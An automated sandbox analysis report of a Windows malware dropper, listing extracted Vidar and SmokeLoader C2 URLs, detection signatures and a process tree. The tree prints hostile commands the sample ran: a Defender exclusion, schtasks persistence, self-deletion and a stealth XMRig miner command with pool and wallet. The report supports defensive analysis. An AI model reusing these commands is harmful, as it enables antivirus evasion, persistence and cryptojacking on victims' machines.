Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7-en -
submitted
08-09-2021 06:02
Static task
static1
Behavioral task
behavioral1
Sample
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe
Resource
win10v20210408
General
-
Target
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
916
https://gheorghip.tumblr.com/
-
profile_id
916
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral1/memory/1816-300-0x0000000000400000-0x0000000002575000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 2496 rundll32.exe 55 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2680 2496 rundll32.exe 55 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
resource yara_rule behavioral1/files/0x0001000000012f20-124.dat family_socelars behavioral1/files/0x0001000000012f20-163.dat family_socelars behavioral1/files/0x0001000000012f20-168.dat family_socelars behavioral1/files/0x0001000000012f20-174.dat family_socelars -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1188-182-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar behavioral1/memory/840-238-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral1/memory/2756-346-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
resource yara_rule behavioral1/files/0x0001000000012f18-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f18-70.dat aspack_v212_v242 behavioral1/files/0x0002000000012f12-71.dat aspack_v212_v242 behavioral1/files/0x0002000000012f12-72.dat aspack_v212_v242 behavioral1/files/0x0001000000012f1a-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012f1a-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 1708 setup_installer.exe 1472 setup_install.exe 1896 Tue11d7385a978cc.exe 1436 Tue11f251db82fb7b.exe 1084 Tue11141271fbe5877f.exe 580 Tue11bc0507b56295.exe 1188 Tue112c483dd3245d.exe 1640 Tue1109eec571ac.exe 984 Tue11b9d76a96506.exe 284 Tue118f55232e4.exe 2112 Tue11b9d76a96506.tmp -
Loads dropped DLL 42 IoCs
pid Process 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 1708 setup_installer.exe 1708 setup_installer.exe 1708 setup_installer.exe 1708 setup_installer.exe 1708 setup_installer.exe 1708 setup_installer.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 1472 setup_install.exe 616 cmd.exe 592 cmd.exe 1896 Tue11d7385a978cc.exe 1896 Tue11d7385a978cc.exe 1556 cmd.exe 584 cmd.exe 584 cmd.exe 1560 cmd.exe 1560 cmd.exe 936 cmd.exe 1996 cmd.exe 1996 cmd.exe 580 Tue11bc0507b56295.exe 580 Tue11bc0507b56295.exe 1188 Tue112c483dd3245d.exe 1188 Tue112c483dd3245d.exe 984 Tue11b9d76a96506.exe 984 Tue11b9d76a96506.exe 1732 cmd.exe 1640 Tue1109eec571ac.exe 1640 Tue1109eec571ac.exe 984 Tue11b9d76a96506.exe 284 Tue118f55232e4.exe 284 Tue118f55232e4.exe 2112 Tue11b9d76a96506.tmp 2112 Tue11b9d76a96506.tmp 2112 Tue11b9d76a96506.tmp -
resource yara_rule behavioral1/memory/1040-233-0x0000000001140000-0x0000000001141000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 62 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 2956 1188 WerFault.exe 49 2204 2672 WerFault.exe 58 2944 2140 WerFault.exe 72 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1692 schtasks.exe 2476 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2900 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 1740 taskkill.exe 2820 taskkill.exe 2316 taskkill.exe 3060 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 580 Tue11bc0507b56295.exe 580 Tue11bc0507b56295.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 284 Tue118f55232e4.exe Token: SeAssignPrimaryTokenPrivilege 284 Tue118f55232e4.exe Token: SeLockMemoryPrivilege 284 Tue118f55232e4.exe Token: SeIncreaseQuotaPrivilege 284 Tue118f55232e4.exe Token: SeMachineAccountPrivilege 284 Tue118f55232e4.exe Token: SeTcbPrivilege 284 Tue118f55232e4.exe Token: SeSecurityPrivilege 284 Tue118f55232e4.exe Token: SeTakeOwnershipPrivilege 284 Tue118f55232e4.exe Token: SeLoadDriverPrivilege 284 Tue118f55232e4.exe Token: SeSystemProfilePrivilege 284 Tue118f55232e4.exe Token: SeSystemtimePrivilege 284 Tue118f55232e4.exe Token: SeProfSingleProcessPrivilege 284 Tue118f55232e4.exe Token: SeIncBasePriorityPrivilege 284 Tue118f55232e4.exe Token: SeCreatePagefilePrivilege 284 Tue118f55232e4.exe Token: SeCreatePermanentPrivilege 284 Tue118f55232e4.exe Token: SeBackupPrivilege 284 Tue118f55232e4.exe Token: SeRestorePrivilege 284 Tue118f55232e4.exe Token: SeShutdownPrivilege 284 Tue118f55232e4.exe Token: SeDebugPrivilege 284 Tue118f55232e4.exe Token: SeAuditPrivilege 284 Tue118f55232e4.exe Token: SeSystemEnvironmentPrivilege 284 Tue118f55232e4.exe Token: SeChangeNotifyPrivilege 284 Tue118f55232e4.exe Token: SeRemoteShutdownPrivilege 284 Tue118f55232e4.exe Token: SeUndockPrivilege 284 Tue118f55232e4.exe Token: SeSyncAgentPrivilege 284 Tue118f55232e4.exe Token: SeEnableDelegationPrivilege 284 Tue118f55232e4.exe Token: SeManageVolumePrivilege 284 Tue118f55232e4.exe Token: SeImpersonatePrivilege 284 Tue118f55232e4.exe Token: SeCreateGlobalPrivilege 284 Tue118f55232e4.exe Token: 31 284 Tue118f55232e4.exe Token: 32 284 Tue118f55232e4.exe Token: 33 284 Tue118f55232e4.exe Token: 34 284 Tue118f55232e4.exe Token: 35 284 Tue118f55232e4.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1996 wrote to memory of 1708 1996 90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe 26 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1708 wrote to memory of 1472 1708 setup_installer.exe 27 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 704 1472 setup_install.exe 33 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 616 1472 setup_install.exe 34 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 936 1472 setup_install.exe 36 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 592 1472 setup_install.exe 35 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 1472 wrote to memory of 584 1472 setup_install.exe 37 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 616 wrote to memory of 1896 616 cmd.exe 38 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 704 wrote to memory of 880 704 cmd.exe 52 PID 1472 wrote to memory of 1560 1472 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe"C:\Users\Admin\AppData\Local\Temp\90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11d7385a978cc.exeTue11d7385a978cc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵
- Loads dropped DLL
PID:592 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe5⤵
- Executes dropped EXE
PID:1436 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:3048
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:988
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1692
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2972
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2596
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2476
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:1700
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:372
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"7⤵PID:840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Alfanewfile2.exe /f9⤵
- Kills process with taskkill
PID:1740
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:2900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\is-NMNMD.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NMNMD.tmp\setup_2.tmp" /SL5="$10196,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:2648
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2884
-
C:\Users\Admin\AppData\Local\Temp\is-UTCOR.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UTCOR.tmp\setup_2.tmp" /SL5="$201B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:2348
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:1044
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe4⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11b9d76a96506.exeTue11b9d76a96506.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:984 -
C:\Users\Admin\AppData\Local\Temp\is-FTQHA.tmp\Tue11b9d76a96506.tmp"C:\Users\Admin\AppData\Local\Temp\is-FTQHA.tmp\Tue11b9d76a96506.tmp" /SL5="$4012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11b9d76a96506.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\is-S1M4P.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-S1M4P.tmp\46807GHF____.exe" /S /UID=burnerch27⤵PID:2824
-
C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe"C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe" /VERYSILENT8⤵PID:2492
-
C:\Users\Admin\AppData\Local\Temp\is-OEP19.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-OEP19.tmp\ultramediaburner.tmp" /SL5="$301A0,281924,62464,C:\Program Files\Windows Defender\ODMKZTRDEC\ultramediaburner.exe" /VERYSILENT9⤵PID:584
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:2216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ba-415fe-e5a-6638c-c528d7e5ea83c\Qoxofuvishe.exe"C:\Users\Admin\AppData\Local\Temp\ba-415fe-e5a-6638c-c528d7e5ea83c\Qoxofuvishe.exe"8⤵PID:2772
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3048
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3048 CREDAT:275457 /prefetch:210⤵PID:2156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\05-5a10b-aef-b199a-191c480282b2d\Moriqefaeka.exe"C:\Users\Admin\AppData\Local\Temp\05-5a10b-aef-b199a-191c480282b2d\Moriqefaeka.exe"8⤵PID:2916
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wqhufond.qmk\GcleanerEU.exe /eufive & exit9⤵PID:2180
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone4⤵
- Loads dropped DLL
PID:584 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue1109eec571ac.exeTue1109eec571ac.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue1109eec571ac.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue1109eec571ac.exe" & exit6⤵PID:2712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue1109eec571ac.exe" /f7⤵
- Kills process with taskkill
PID:2820
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe4⤵
- Loads dropped DLL
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11bc0507b56295.exeTue11bc0507b56295.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe4⤵
- Loads dropped DLL
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue11141271fbe5877f.exeTue11141271fbe5877f.exe5⤵
- Executes dropped EXE
PID:1084 -
C:\ProgramData\339232.exe"C:\ProgramData\339232.exe"6⤵PID:2672
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2672 -s 17807⤵
- Program crash
PID:2204
-
-
-
C:\ProgramData\8685254.exe"C:\ProgramData\8685254.exe"6⤵PID:2792
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2984
-
-
-
C:\ProgramData\4044235.exe"C:\ProgramData\4044235.exe"6⤵PID:1040
-
-
C:\ProgramData\2361480.exe"C:\ProgramData\2361480.exe"6⤵PID:884
-
-
C:\ProgramData\1060764.exe"C:\ProgramData\1060764.exe"6⤵PID:2140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2140 -s 6167⤵
- Program crash
PID:2944
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue118f55232e4.exe4⤵
- Loads dropped DLL
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue118f55232e4.exeTue118f55232e4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:284 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2316
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe4⤵
- Loads dropped DLL
PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe4⤵PID:1680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCA632E14\Tue112c483dd3245d.exeTue112c483dd3245d.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 9603⤵
- Program crash
PID:2956
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2572 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a1⤵PID:3044
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2680 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2724
-